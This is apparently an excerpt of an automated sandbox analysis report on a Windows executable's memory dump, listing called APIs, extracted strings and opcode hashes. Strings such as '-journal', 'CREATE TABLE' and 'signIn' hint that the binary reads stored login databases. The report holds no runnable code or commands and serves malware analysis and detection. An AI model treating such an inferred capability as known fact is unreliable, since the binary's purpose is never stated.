                                                                                                                                                                                    • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                                                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                                                                                                    • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                    • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                    • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                    • String ID: 3A
                                                                                                                                                                                    • API String ID: 3300951397-293699754
                                                                                                                                                                                    • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                                                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                    • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                    • String ID: strings
                                                                                                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                                                                                                    • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                    • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                    • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                    • String ID: AE$.cfg$General$EA
                                                                                                                                                                                    • API String ID: 776488737-1622828088
                                                                                                                                                                                    • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                    • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                                                    • API String ID: 1028950076-4169760276
                                                                                                                                                                                    • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                    • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                    • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                    • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                    • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: -journal$-wal
                                                                                                                                                                                    • API String ID: 438689982-2894717839
                                                                                                                                                                                    • Opcode ID: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                                                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                    • Opcode Fuzzy Hash: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3975816621-0
                                                                                                                                                                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                    • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                    • API String ID: 1214746602-2708368587
                                                                                                                                                                                    • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                                                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                    • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                                                                                                    • memset.MSVCRT ref: 00405E33
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                                                                                                    • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2313361498-0
                                                                                                                                                                                    • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
APIs
• GetClientRect.USER32(?,?), ref: 00405F65
• GetWindow.USER32(?,00000005), ref: 00405F7D
• GetWindow.USER32(00000000), ref: 00405F80
  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
• GetWindow.USER32(00000000,00000002), ref: 00405F8C
• GetDlgItem.USER32(?,0000040C), ref: 00405FA2
• SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
• GetDlgItem.USER32(?,0000040E), ref: 00405FEB
• SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Window$ItemMessageRectSend$Client
• String ID:
• API String ID: 2047574939-0
• Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
• Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
• Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
• Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
APIs
• GetSystemTime.KERNEL32(?), ref: 00418836
• memcpy.MSVCRT(?,?,00000010), ref: 00418845
• GetCurrentProcessId.KERNEL32 ref: 00418856
• memcpy.MSVCRT(?,?,00000004), ref: 00418869
• GetTickCount.KERNEL32 ref: 0041887D
• memcpy.MSVCRT(?,?,00000004), ref: 00418890
• QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
• memcpy.MSVCRT(?,?,00000008), ref: 004188B6
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
• String ID:
• API String ID: 4218492932-0
• Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
• Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
• Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
• Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
APIs
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
• memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
• memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
• memcpy.MSVCRT(?,?,00000040), ref: 0044A988
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
• memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
• memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
• memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpy$memset
• String ID: gj
• API String ID: 438689982-4203073231
• Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
• Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
• Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
• Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
APIs
• memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpy
• String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
• API String ID: 3510742995-2446657581
• Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
• Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
• Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
• Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405A25
• SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
• SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
• SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
• memset.MSVCRT ref: 00405ABB
• SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
• SetFocus.USER32(?), ref: 00405B76
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
• API String ID: 4281309102-0
• Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
• Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
• Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
• Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: _snwprintfwcscat
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
• API String ID: 384018552-4153097237
• Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
• Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
• Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
• Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ItemMenu$CountInfomemsetwcschr
• String ID: 0$6
• API String ID: 2029023288-3849865405
• Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
• Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
• Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
• Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
APIs
  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
• memset.MSVCRT ref: 00405455
• memset.MSVCRT ref: 0040546C
• memset.MSVCRT ref: 00405483
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$memcpy$ErrorLast
• String ID: 6$\
• API String ID: 404372293-1284684873
                                                                                                                                                                                    • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                                                                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                                                                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1331804452-0
                                                                                                                                                                                    • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                                                                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                    APIs
